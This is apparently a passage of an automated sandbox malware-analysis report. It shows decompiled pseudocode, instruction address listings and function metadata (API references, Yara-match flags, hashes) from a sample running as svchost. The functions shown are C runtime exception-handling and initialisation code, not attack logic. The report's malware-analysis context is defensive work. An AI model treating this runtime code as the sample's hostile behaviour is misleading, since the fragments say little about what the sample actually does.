																		_t50 = _t278 - 0x10; // 0x0
																		_v60 = _t50;
																		_t289 = _a20;
																		__eflags =  *((intOrPtr*)(_t278 - 0x10)) - _t234;
																		if( *((intOrPtr*)(_t278 - 0x10)) <= _t234) {
																			__eflags = _t234 -  *((intOrPtr*)(_t278 - 0xc));
																			if(_t234 <=  *((intOrPtr*)(_t278 - 0xc))) {
																				_v24 =  *_t278;
																				_t263 =  *(_t278 - 4);
																				__eflags = _t263;
																				_v32 = _t263;
																				_t253 = _a8;
																				if(_t263 > 0) {
																					_t279 = _v24;
																					_t236 =  *( *((intOrPtr*)(_t304 + 0x1c)) + 0xc);
																					_t287 =  *_t236;
																					_t237 =  &(_t236[1]);
																					__eflags = _t237;
																					_v52 = _t237;
																					_t238 = _v32;
																					_v56 = _t287;
																					while(1) {
																						_v20 = _v52;
																						_t289 = _a20;
																						_v40 = _t287;
																						__eflags = _t287;
																						if(_t287 <= 0) {
																							goto L41;
																						} else {
																							goto L38;
																						}
																						while(1) {
																							L38:
																							_t240 = E6FD573F5(_t279,  *_v20,  *((intOrPtr*)(_t304 + 0x1c)));
																							_t316 = _t316 + 0xc;
																							__eflags = _t240;
																							if(_t240 != 0) {
																								break;
																							}
																							_v20 = _v20 + 4;
																							_t244 = _v40 - 1;
																							_t279 = _v24;
																							_v40 = _t244;
																							__eflags = _t244;
																							if(_t244 > 0) {
																								continue;
																							} else {
																								_t238 = _v32;
																								goto L41;
																							}
																							L44:
																							_t282 = _v28;
																							_t278 = _v36;
																							_t234 = _v12;
																							goto L45;
																						}
																						_push(_v44);
																						_v5 = 1;
																						E6FD569E3(_t253, _t287, _t304, _t253, _v16, _a16, _t289, _v24,  *_v20, _v60, _a28, _a32);
																						_t316 = _t316 + 0x2c;
																						goto L44;
																						L41:
																						_t238 = _t238 - 1;
																						_t279 = _t279 + 0x10;
																						_v32 = _t238;
																						_v24 = _t279;
																						__eflags = _t238;
																						if(_t238 > 0) {
																							_t287 = _v56;
																							_v20 = _v52;
																							_t289 = _a20;
																							_v40 = _t287;
																							__eflags = _t287;
																							if(_t287 <= 0) {
																								goto L41;
																							} else {
																								goto L38;
																							}
																						}
																						goto L44;
																					}
																				}
																			}
																		}
																		L45:
																		_t282 = _t282 + 1;
																		_t278 = _t278 + 0x14;
																		_v28 = _t282;
																		_v36 = _t278;
																		__eflags = _t282 - _v48;
																	} while (_t282 < _v48);
																}
															}
															__eflags = _a24;
															if(__eflags != 0) {
																_push(1);
																E6FD5670F(__eflags);
																_t264 = _t304;
															}
															__eflags = _v5;
															if(__eflags != 0) {
																L60:
																_t225 = E6FD580E6(_t253, _t264, _t282, _t289, _t304, __eflags);
																__eflags =  *(_t225 + 0x1c);
																if(__eflags != 0) {
																	goto L62;
																} else {
																	goto L61;
																}
															} else {
																_t227 =  *_t289 & 0x1fffffff;
																__eflags = _t227 - 0x19930521;
																if(__eflags < 0) {
																	goto L60;
																} else {
																	__eflags = _t289[7];
																	if(_t289[7] != 0) {
																		L52:
																		__eflags = _t289[8] & 0x00000004;
																		if(__eflags != 0) {
																			goto L62;
																		} else {
																			_push(_t289[7]);
																			L86();
																			_t264 = _t304;
																			__eflags = _t227;
																			if(__eflags != 0) {
																				goto L60;
																			} else {
																				E6FD580E6(_t253, _t264, _t282, _t289, _t304, __eflags);
																				E6FD580E6(_t253, _t264, _t282, _t289, _t304, __eflags);
																				 *((intOrPtr*)(E6FD580E6(_t253, _t264, _t282, _t289, _t304, __eflags) + 0x10)) = _t304;
																				_t231 = E6FD580E6(_t253, _t264, _t282, _t289, _t304, __eflags);
																				__eflags = _a32;
																				_t267 = _v16;
																				_push(_t304);
																				 *((intOrPtr*)(_t231 + 0x14)) = _t267;
																				if(_a32 != 0) {
																					goto L64;
																				} else {
																					_push(_t253);
																				}
																				goto L65;
																			}
																		}
																	} else {
																		__eflags = _t289[8] & 0x00000004;
																		if(__eflags == 0) {
																			goto L60;
																		} else {
																			goto L52;
																		}
																	}
																}
															}
														} else {
															__eflags =  *((intOrPtr*)(_t304 + 0x14)) - 0x19930521;
															if( *((intOrPtr*)(_t304 + 0x14)) == 0x19930521) {
																goto L30;
															} else {
																__eflags =  *((intOrPtr*)(_t304 + 0x14)) - 0x19930522;
																if( *((intOrPtr*)(_t304 + 0x14)) != 0x19930522) {
																	goto L57;
																} else {
																	goto L30;
																}
															}
														}
													}
												}
											} else {
												_v36 =  *((intOrPtr*)(E6FD580E6(_t253, _t264, _t282, _t289, _t304, _t337) + 0x1c));
												_t251 = E6FD580E6(_t253, _t264, _t282, _t289, _t304, _t337);
												_push(_v36);
												_push(_t304);
												 *(_t251 + 0x1c) =  *(_t251 + 0x1c) & 0x00000000;
												L86();
												if(_t251 != 0) {
													goto L24;
												} else {
													_push(_v36);
													L99();
													_pop(_t264);
													_t339 = _t251;
													if(_t251 == 0) {
														goto L62;
													} else {
													}
													L63:
													_push(1);
													_push(_t304);
													E6FD5670F(_t339);
													_t267 =  &_v72;
													E6FD567C4(_t267);
													E6FD578AD( &_v72, 0x6fd669b4);
													L64:
													_push(_a32);
													L65:
													E6FD583F3(_t267);
													_push(_a16);
													_push(_t253);
													E6FD57231(_t253, _t267, _t282, _t289, _t339);
													_t317 = _t316 + 0x10;
													_push(_t289[7]);
													_t198 = E6FD569A9(_t253, _t267, _t282, _t289, _t304, _t339);
													asm("int3");
													_t313 = _t317;
													_push(_t267);
													_push(_t267);
													_push(_t289);
													_t290 = _v80;
													_t340 =  *_t290 - 0x80000003;
													if( *_t290 == 0x80000003) {
														L84:
														return _t198;
													} else {
														_push(_t253);
														_push(_t304);
														_t199 = E6FD580E6(_t253, _t267, _t282, _t290, _t304, _t340);
														_t254 = _a16;
														_t341 =  *((intOrPtr*)(_t199 + 8));
														if( *((intOrPtr*)(_t199 + 8)) == 0) {
															L72:
															if( *((intOrPtr*)(_t254 + 0xc)) == 0) {
																E6FD59ED0(_t254, _t267, _t282, _t290, _t304, __eflags);
																asm("int3");
																_push(_t313);
																_t314 = _t317;
																_t318 = _t317 - 0x18;
																_push(_t254);
																_push(_t304);
																_t305 = _v100;
																_push(_t290);
																__eflags = _t305;
																if(__eflags == 0) {
																	E6FD59ED0(_t254, _t267, _t282, _t290, _t305, __eflags);
																	asm("int3");
																	_push(_t314);
																	_push(_t254);
																	_push(_t305);
																	_push(_t290);
																	_t292 = _v144;
																	_t306 = 0;
																	__eflags =  *_t292;
																	if( *_t292 <= 0) {
																		L103:
																		_t202 = 0;
																		__eflags = 0;
																	} else {
																		_t256 = 0;
																		while(1) {
																			_t206 = E6FD57A7A( *((intOrPtr*)(_t256 + _t292[1] + 4)) + 4, 0x6fd6ad1c);
																			__eflags = _t206;
																			if(_t206 == 0) {
																				break;
																			}
																			_t306 = _t306 + 1;
																			_t256 = _t256 + 0x10;
																			__eflags = _t306 -  *_t292;
																			if(_t306 <  *_t292) {
																				continue;
																			} else {
																				goto L103;
																			}
																			goto L104;
																		}
																		_t202 = 1;
																	}
																	L104:
																	return _t202;
																} else {
																	_t294 =  *_t305;
																	_t257 = 0;
																	__eflags = _t294;
																	if(_t294 > 0) {
																		_t283 = 0;
																		_v16 = 0;
																		_t210 =  *((intOrPtr*)( *((intOrPtr*)(_v4 + 0x1c)) + 0xc));
																		_t211 = _t210 + 4;
																		__eflags = _t211;
																		_v28 =  *_t210;
																		_v36 = _t211;
																		do {
																			_t271 = _t211;
																			_t212 = _v28;
																			_v24 = _t211;
																			_v20 = _t212;
																			__eflags = _t212;
																			if(_t212 > 0) {
																				_t214 =  *((intOrPtr*)(_t305 + 4)) + _t283;
																				__eflags = _t214;
																				_v32 = _t214;
																				while(1) {
																					_t215 = E6FD573F5(_t214,  *_t271,  *((intOrPtr*)(_v4 + 0x1c)));
																					_t318 = _t318 + 0xc;
																					__eflags = _t215;
																					if(_t215 != 0) {
																						break;
																					}
																					_t217 = _v20 - 1;
																					_t271 = _v24 + 4;
																					_v20 = _t217;
																					__eflags = _t217;
																					_v24 = _v24 + 4;
																					_t214 = _v32;
																					if(_t217 > 0) {
																						continue;
																					} else {
																					}
																					L95:
																					_t283 = _v16;
																					goto L96;
																				}
																				_t257 = 1;
																				goto L95;
																			}
																			L96:
																			_t211 = _v36;
																			_t283 = _t283 + 0x10;
																			_v16 = _t283;
																			_t294 = _t294 - 1;
																			__eflags = _t294;
																		} while (_t294 != 0);
																	}
																	return _t257;
																}
															} else {
																_t198 = E6FD58349(_t267, _t254, _a24, _a20,  &_v16,  &_v12);
																_t273 = _v16;
																_t319 = _t317 + 0x14;
																_t285 = _v12;
																if(_t273 < _t285) {
																	_t137 =  &(_t198[3]); // 0xc
																	_t310 = _t137;
																	_t198 = _a20;
																	do {
																		if(_t198 >=  *((intOrPtr*)(_t310 - 0xc)) && _t198 <=  *((intOrPtr*)(_t310 - 8))) {
																			_t221 =  *_t310 << 4;
																			if( *((intOrPtr*)(_t310[1] + _t221 - 0xc)) == 0) {
																				L79:
																				_t222 = _t221 + _t310[1] + 0xfffffff0;
																				_t300 = _v0;
																				if(( *(_t221 + _t310[1] + 0xfffffff0) & 0x00000040) == 0) {
																					_push(1);
																					_t155 = _t310 - 0xc; // 0x0
																					E6FD569E3(_t254, _t285, _t300, _a4, _a8, _a12, _t254, _t222, 0, _t155, _a24, _a28);
																					_t285 = _v12;
																					_t319 = _t319 + 0x2c;
																					_t273 = _v16;
																				}
																			} else {
																				_t285 = _v12;
																				_t254 = _a16;
																				if( *((char*)( *((intOrPtr*)(_t310[1] + _t221 - 0xc)) + 8)) == 0) {
																					goto L79;
																				}
																			}
																			_t198 = _a20;
																		}
																		_t273 = _t273 + 1;
																		_t310 =  &(_t310[5]);
																		_v16 = _t273;
																	} while (_t273 < _t285);
																}
																goto L83;
															}
														} else {
															__imp__EncodePointer(0);
															_t304 = _t199;
															if( *((intOrPtr*)(E6FD580E6(_t254, _t267, _t282, _t290, _t304, _t341) + 8)) == _t304 ||  *_t290 == 0xe0434f4d ||  *_t290 == 0xe0434352) {
																goto L72;
															} else {
																_t198 = E6FD5826C(_t290, _a4, _a8, _a12, _t254, _a24, _a28);
																_t317 = _t317 + 0x1c;
																if(_t198 != 0) {
																	L83:
																	goto L84;
																} else {
																	goto L72;
																}
															}
														}
													}
												}
											}
										} else {
											_t336 =  *((intOrPtr*)(_t304 + 0x1c));
											if( *((intOrPtr*)(_t304 + 0x1c)) == 0) {
												goto L62;
											} else {
												goto L19;
											}
										}
									}
								}
							}
						}
					}
				}
			}
















































































                                                0x6fd56aa8
                                                0x6fd56aa8
                                                0x6fd56aaf
                                                0x6fd56ab2
                                                0x6fd56ab4
                                                0x6fd56ab7
                                                0x6fd56abb
                                                0x6fd56ac6
                                                0x6fd56ace
                                                0x6fd56ac8
                                                0x6fd56ac8
                                                0x6fd56ac8
                                                0x6fd56ad1
                                                0x6fd56ad7
                                                0x6fd56dc1
                                                0x6fd56dc1
                                                0x00000000
                                                0x6fd56ae6
                                                0x6fd56ae6
                                                0x6fd56aef
                                                0x6fd56d8a
                                                0x00000000
                                                0x6fd56af5
                                                0x6fd56af9
                                                0x6fd56bcd
                                                0x6fd56bcd
                                                0x6fd56bd0
                                                0x00000000
                                                0x6fd56b1e
                                                0x6fd56b1e
                                                0x6fd56b22
                                                0x00000000
                                                0x6fd56b28
                                                0x6fd56b28
                                                0x6fd56b2d
                                                0x6fd56b31
                                                0x6fd56dba
                                                0x6fd56dc0
                                                0x6fd56b37
                                                0x6fd56b3c
                                                0x6fd56b3f
                                                0x6fd56b44
                                                0x6fd56b4b
                                                0x6fd56b50
                                                0x00000000
                                                0x6fd56b56
                                                0x6fd56b5c
                                                0x6fd56b89
                                                0x6fd56b89
                                                0x6fd56b8e
                                                0x6fd56b92
                                                0x6fd56bd5
                                                0x6fd56bd5
                                                0x6fd56bd8
                                                0x6fd56bdb
                                                0x6fd56bdb
                                                0x6fd56be1
                                                0x6fd56d8d
                                                0x6fd56d8d
                                                0x6fd56d91
                                                0x00000000
                                                0x6fd56d93
                                                0x6fd56d93
                                                0x6fd56d97
                                                0x00000000
                                                0x6fd56d99
                                                0x6fd56d99
                                                0x6fd56d9c
                                                0x6fd56d9f
                                                0x6fd56da0
                                                0x6fd56da1
                                                0x6fd56da4
                                                0x6fd56da5
                                                0x6fd56da6
                                                0x6fd56da7
                                                0x6fd56dac
                                                0x00000000
                                                0x6fd56dac
                                                0x6fd56d97
                                                0x6fd56be7
                                                0x6fd56be7
                                                0x6fd56beb
                                                0x00000000
                                                0x6fd56bf1
                                                0x6fd56bf1
                                                0x6fd56bf8
                                                0x6fd56c10
                                                0x6fd56c10
                                                0x6fd56c14
                                                0x6fd56c1e
                                                0x6fd56c27
                                                0x6fd56c2c
                                                0x6fd56c2f
                                                0x6fd56c32
                                                0x6fd56c35
                                                0x6fd56c3b
                                                0x6fd56c3b
                                                0x6fd56c3e
                                                0x6fd56c41
                                                0x6fd56c44
                                                0x6fd56c44
                                                0x6fd56c47
                                                0x6fd56c4a
                                                0x6fd56c4d
                                                0x6fd56c50
                                                0x6fd56c56
                                                0x6fd56c59
                                                0x6fd56c61
                                                0x6fd56c64
                                                0x6fd56c67
                                                0x6fd56c69
                                                0x6fd56c6c
                                                0x6fd56c6f
                                                0x6fd56c78
                                                0x6fd56c7b
                                                0x6fd56c7e
                                                0x6fd56c80
                                                0x6fd56c80
                                                0x6fd56c83
                                                0x6fd56c86
                                                0x6fd56c89
                                                0x6fd56c8c
                                                0x6fd56c8f
                                                0x6fd56c92
                                                0x6fd56c95
                                                0x6fd56c98
                                                0x6fd56c9a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6fd56c9c
                                                0x6fd56c9c
                                                0x6fd56ca5
                                                0x6fd56caa
                                                0x6fd56cad
                                                0x6fd56caf
                                                0x00000000
                                                0x00000000
                                                0x6fd56cb4
                                                0x6fd56cb8
                                                0x6fd56cb9
                                                0x6fd56cbc
                                                0x6fd56cbf
                                                0x6fd56cc1
                                                0x00000000
                                                0x6fd56cc3
                                                0x6fd56cc3
                                                0x00000000
                                                0x6fd56cc3
                                                0x6fd56d02
                                                0x6fd56d02
                                                0x6fd56d05
                                                0x6fd56d08
                                                0x00000000
                                                0x6fd56d08
                                                0x6fd56cd9
                                                0x6fd56ce2
                                                0x6fd56cfa
                                                0x6fd56cff
                                                0x00000000
                                                0x6fd56cc6
                                                0x6fd56cc6
                                                0x6fd56cc7
                                                0x6fd56cca
                                                0x6fd56ccd
                                                0x6fd56cd0
                                                0x6fd56cd2
                                                0x6fd56cd4
                                                0x6fd56c8f
                                                0x6fd56c92
                                                0x6fd56c95
                                                0x6fd56c98
                                                0x6fd56c9a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6fd56c9a
                                                0x00000000
                                                0x6fd56cd2
                                                0x6fd56c8c
                                                0x6fd56c6f
                                                0x6fd56c59
                                                0x6fd56d0b
                                                0x6fd56d0b
                                                0x6fd56d0c
                                                0x6fd56d0f
                                                0x6fd56d12
                                                0x6fd56d15
                                                0x6fd56d15
                                                0x6fd56c44
                                                0x6fd56c35
                                                0x6fd56d1e
                                                0x6fd56d22
                                                0x6fd56d24
                                                0x6fd56d27
                                                0x6fd56d2d
                                                0x6fd56d2d
                                                0x6fd56d2e
                                                0x6fd56d32
                                                0x6fd56daf
                                                0x6fd56daf
                                                0x6fd56db4
                                                0x6fd56db8
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6fd56d34
                                                0x6fd56d36
                                                0x6fd56d3b
                                                0x6fd56d40
                                                0x00000000
                                                0x6fd56d42
                                                0x6fd56d42
                                                0x6fd56d46
                                                0x6fd56d4e
                                                0x6fd56d4e
                                                0x6fd56d52
                                                0x00000000
                                                0x6fd56d54
                                                0x6fd56d54
                                                0x6fd56d58
                                                0x6fd56d5e
                                                0x6fd56d5f
                                                0x6fd56d61
                                                0x00000000
                                                0x6fd56d63
                                                0x6fd56d63
                                                0x6fd56d68
                                                0x6fd56d72
                                                0x6fd56d75
                                                0x6fd56d7a
                                                0x6fd56d7e
                                                0x6fd56d81
                                                0x6fd56d82
                                                0x6fd56d85
                                                0x00000000
                                                0x6fd56d87
                                                0x6fd56d87
                                                0x6fd56d87
                                                0x00000000
                                                0x6fd56d85
                                                0x6fd56d61
                                                0x6fd56d48
                                                0x6fd56d48
                                                0x6fd56d4c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6fd56d4c
                                                0x6fd56d46
                                                0x6fd56d40
                                                0x6fd56bfa
                                                0x6fd56bfa
                                                0x6fd56c01
                                                0x00000000
                                                0x6fd56c03
                                                0x6fd56c03
                                                0x6fd56c0a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6fd56c0a
                                                0x6fd56c01
                                                0x6fd56bf8
                                                0x6fd56beb
                                                0x6fd56b94
                                                0x6fd56b9c
                                                0x6fd56b9f
                                                0x6fd56ba4
                                                0x6fd56ba7
                                                0x6fd56ba8
                                                0x6fd56bac
                                                0x6fd56bb5
                                                0x00000000
                                                0x6fd56bb7
                                                0x6fd56bb7
                                                0x6fd56bba
                                                0x6fd56bbf
                                                0x6fd56bc0
                                                0x6fd56bc2
                                                0x00000000
                                                0x00000000
                                                0x6fd56bc8
                                                0x6fd56dc6
                                                0x6fd56dc6
                                                0x6fd56dc8
                                                0x6fd56dc9
                                                0x6fd56dd0
                                                0x6fd56dd3
                                                0x6fd56de1
                                                0x6fd56de6
                                                0x6fd56de6
                                                0x6fd56de9
                                                0x6fd56de9
                                                0x6fd56df1
                                                0x6fd56df4
                                                0x6fd56df5
                                                0x6fd56dfa
                                                0x6fd56dfd
                                                0x6fd56e00
                                                0x6fd56e05
                                                0x6fd56e07
                                                0x6fd56e09
                                                0x6fd56e0a
                                                0x6fd56e0b
                                                0x6fd56e0c
                                                0x6fd56e0f
                                                0x6fd56e15
                                                0x6fd56f16
                                                0x6fd56f1a
                                                0x6fd56e1b
                                                0x6fd56e1b
                                                0x6fd56e1c
                                                0x6fd56e1d
                                                0x6fd56e22
                                                0x6fd56e25
                                                0x6fd56e29
                                                0x6fd56e70
                                                0x6fd56e74
                                                0x6fd56f1b
                                                0x6fd56f20
                                                0x6fd56f21
                                                0x6fd56f22
                                                0x6fd56f24
                                                0x6fd56f27
                                                0x6fd56f28
                                                0x6fd56f29
                                                0x6fd56f2c
                                                0x6fd56f2d
                                                0x6fd56f2f
                                                0x6fd56fb7
                                                0x6fd56fbc
                                                0x6fd56fbd
                                                0x6fd56fc0
                                                0x6fd56fc1
                                                0x6fd56fc2
                                                0x6fd56fc3
                                                0x6fd56fc6
                                                0x6fd56fc8
                                                0x6fd56fca
                                                0x6fd56ff1
                                                0x6fd56ff1
                                                0x6fd56ff1
                                                0x6fd56fcc
                                                0x6fd56fcc
                                                0x6fd56fce
                                                0x6fd56fde
                                                0x6fd56fe5
                                                0x6fd56fe7
                                                0x00000000
                                                0x00000000
                                                0x6fd56fe9
                                                0x6fd56fea
                                                0x6fd56fed
                                                0x6fd56fef
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6fd56fef
                                                0x6fd56ff8
                                                0x6fd56ff8
                                                0x6fd56ff3
                                                0x6fd56ff7
                                                0x6fd56f35
                                                0x6fd56f35
                                                0x6fd56f37
                                                0x6fd56f39
                                                0x6fd56f3b
                                                0x6fd56f40
                                                0x6fd56f42
                                                0x6fd56f48
                                                0x6fd56f4d
                                                0x6fd56f4d
                                                0x6fd56f50
                                                0x6fd56f53
                                                0x6fd56f56
                                                0x6fd56f56
                                                0x6fd56f58
                                                0x6fd56f5b
                                                0x6fd56f5e
                                                0x6fd56f61
                                                0x6fd56f63
                                                0x6fd56f68
                                                0x6fd56f68
                                                0x6fd56f6a
                                                0x6fd56f6d
                                                0x6fd56f76
                                                0x6fd56f7b
                                                0x6fd56f7e
                                                0x6fd56f80
                                                0x00000000
                                                0x00000000
                                                0x6fd56f88
                                                0x6fd56f89
                                                0x6fd56f8c
                                                0x6fd56f8f
                                                0x6fd56f91
                                                0x6fd56f94
                                                0x6fd56f97
                                                0x00000000
                                                0x00000000
                                                0x6fd56f99
                                                0x6fd56f9d
                                                0x6fd56f9d
                                                0x00000000
                                                0x6fd56f9d
                                                0x6fd56f9b
                                                0x00000000
                                                0x6fd56f9b
                                                0x6fd56fa0
                                                0x6fd56fa0
                                                0x6fd56fa3
                                                0x6fd56fa6
                                                0x6fd56fa9
                                                0x6fd56fa9
                                                0x6fd56fa9
                                                0x6fd56f56
                                                0x6fd56fb6
                                                0x6fd56fb6
                                                0x6fd56e7a
                                                0x6fd56e89
                                                0x6fd56e8e
                                                0x6fd56e91
                                                0x6fd56e94
                                                0x6fd56e99
                                                0x6fd56e9b
                                                0x6fd56e9b
                                                0x6fd56e9e
                                                0x6fd56ea1
                                                0x6fd56ea4
                                                0x6fd56eb0
                                                0x6fd56eb9
                                                0x6fd56ece
                                                0x6fd56ed4
                                                0x6fd56ed6
                                                0x6fd56edc
                                                0x6fd56ede
                                                0x6fd56ee3
                                                0x6fd56ef8
                                                0x6fd56efd
                                                0x6fd56f00
                                                0x6fd56f03
                                                0x6fd56f03
                                                0x6fd56ebb
                                                0x6fd56ec2
                                                0x6fd56ec9
                                                0x6fd56ecc
                                                0x00000000
                                                0x00000000
                                                0x6fd56ecc
                                                0x6fd56f06
                                                0x6fd56f06
                                                0x6fd56f09
                                                0x6fd56f0a
                                                0x6fd56f0d
                                                0x6fd56f10
                                                0x6fd56ea1
                                                0x00000000
                                                0x6fd56e99
                                                0x6fd56e2b
                                                0x6fd56e2d
                                                0x6fd56e33
                                                0x6fd56e3d
                                                0x00000000
                                                0x6fd56e4f
                                                0x6fd56e60
                                                0x6fd56e65
                                                0x6fd56e6a
                                                0x6fd56f14
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6fd56e6a
                                                0x6fd56e3d
                                                0x6fd56e29
                                                0x6fd56e15
                                                0x6fd56bb5
                                                0x6fd56b7f
                                                0x6fd56b7f
                                                0x6fd56b83
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6fd56b83
                                                0x6fd56b5c
                                                0x6fd56b50
                                                0x6fd56b31
                                                0x6fd56b22
                                                0x6fd56af9
                                                0x6fd56aef

                                                APIs
                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 6FD56BAC
                                                • _GetRangeOfTrysToCheck.LIBVCRUNTIME ref: 6FD56C27
                                                • ___TypeMatch.LIBVCRUNTIME ref: 6FD56CA5
                                                • ___DestructExceptionObject.LIBVCRUNTIME ref: 6FD56D27
                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 6FD56D58
                                                • FindHandlerForForeignException.LIBVCRUNTIME ref: 6FD56DA7
                                                • ___DestructExceptionObject.LIBVCRUNTIME ref: 6FD56DC9
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 6FD56DE1
                                                • _UnwindNestedFrames.LIBCMT ref: 6FD56DE9
                                                • ___FrameUnwindToState.LIBVCRUNTIME ref: 6FD56DF5
                                                • CallUnexpected.LIBVCRUNTIME ref: 6FD56E00
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: Exception$DestructObjectSpecUnwind$CallCheckException@8FindForeignFrameFramesHandlerMatchNestedRangeStateThrowTrysTypeUnexpected
                                                • String ID: csm$csm$csm
                                                • API String ID: 410073093-393685449
                                                • Opcode ID: 871584129efb9cf9bed9c6efb7164de37edf0c32a09af42ad19d54ef97713dd1
                                                • Instruction ID: a2b207c71a14ad65e775cbe93c612ee33998201b640c850be3df03533b6fc067
                                                • Opcode Fuzzy Hash: 871584129efb9cf9bed9c6efb7164de37edf0c32a09af42ad19d54ef97713dd1
                                                • Instruction Fuzzy Hash: 62B16971804709EFDF90CFA4C880A9EBBB4BF06324F10456AE8516B690D735FA65CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03997F25 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 75libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 03997F35
                                                  • Part of subcall function 0399C4BF: try_get_function.LIBVCRUNTIME ref: 0399C4D4
                                                • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 03997F42
                                                • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 03997F58
                                                • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 03997F66
                                                • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 03997F74
                                                • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 03997F9E
                                                • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 03997FA9
                                                • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 03997FBE
                                                • RtlDeleteCriticalSection.NTDLL(039C23B8), ref: 03997FEE
                                                • CloseHandle.KERNEL32(00000000), ref: 03997FFE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressProc$CriticalHandleSection__crt_fast_encode_pointer$CloseCreateDeleteEventInitializeModule___vcrt_try_get_function
                                                • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$kernel32.dll
                                                • API String ID: 3315678721-758797311
                                                • Opcode ID: e145a667aa59cb641d00c0d2076c6f031ed768c67bcbc606ffb80766235f9878
                                                • Instruction ID: a5568969cec880656848e17f770935b217f91fb905b7c1775fb138c59a0f1e55
                                                • Opcode Fuzzy Hash: e145a667aa59cb641d00c0d2076c6f031ed768c67bcbc606ffb80766235f9878
                                                • Instruction Fuzzy Hash: 9C11B43566C311AFFF10BBF96D09A6E36989BC5A41F08081BFA15EE146EEB084009665
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 039A355D Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$Info
                                                • String ID:
                                                • API String ID: 2509303402-0
                                                • Opcode ID: d8ba45c24533e0c48a1bfa12ff6dcbcef48bf294412a5e05cb6aee1364a3048d
                                                • Instruction ID: cc50e708b0ad26f017668fa2e48ed3955683622506df12437d5329f43b04bb36
                                                • Opcode Fuzzy Hash: d8ba45c24533e0c48a1bfa12ff6dcbcef48bf294412a5e05cb6aee1364a3048d
                                                • Instruction Fuzzy Hash: EEB1BE799047059FDB21DFADC880BEEFBF9FF88340F184269E855AB251D77198418BA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0399B64C Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 270COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 0399B750
                                                • _GetRangeOfTrysToCheck.LIBVCRUNTIME ref: 0399B7CB
                                                • ___TypeMatch.LIBVCRUNTIME ref: 0399B849
                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 0399B8FC
                                                • FindHandlerForForeignException.LIBVCRUNTIME ref: 0399B94B
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0399B985
                                                • _UnwindNestedFrames.LIBCMT ref: 0399B98D
                                                • ___FrameUnwindToState.LIBVCRUNTIME ref: 0399B999
                                                • CallUnexpected.LIBVCRUNTIME ref: 0399B9A4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Exception$SpecUnwind$CallCheckException@8FindForeignFrameFramesHandlerMatchNestedRangeStateThrowTrysTypeUnexpected
                                                • String ID: csm$csm$csm
                                                • API String ID: 3606550248-393685449
                                                • Opcode ID: 14769a727aefe22ca73d307fca00e9ad20d67e8aed0619ba055478fbf3cf765c
                                                • Instruction ID: 56ff6848779920b894cf53afab6ccd535cccedfac8f9951ea33e5fab43fbf2fa
                                                • Opcode Fuzzy Hash: 14769a727aefe22ca73d307fca00e9ad20d67e8aed0619ba055478fbf3cf765c
                                                • Instruction Fuzzy Hash: FBB18E75C00309EFEF24DF9CE884AAEB7BDFF48354F18419AE4516A650D339A941CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 6FD5D363 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
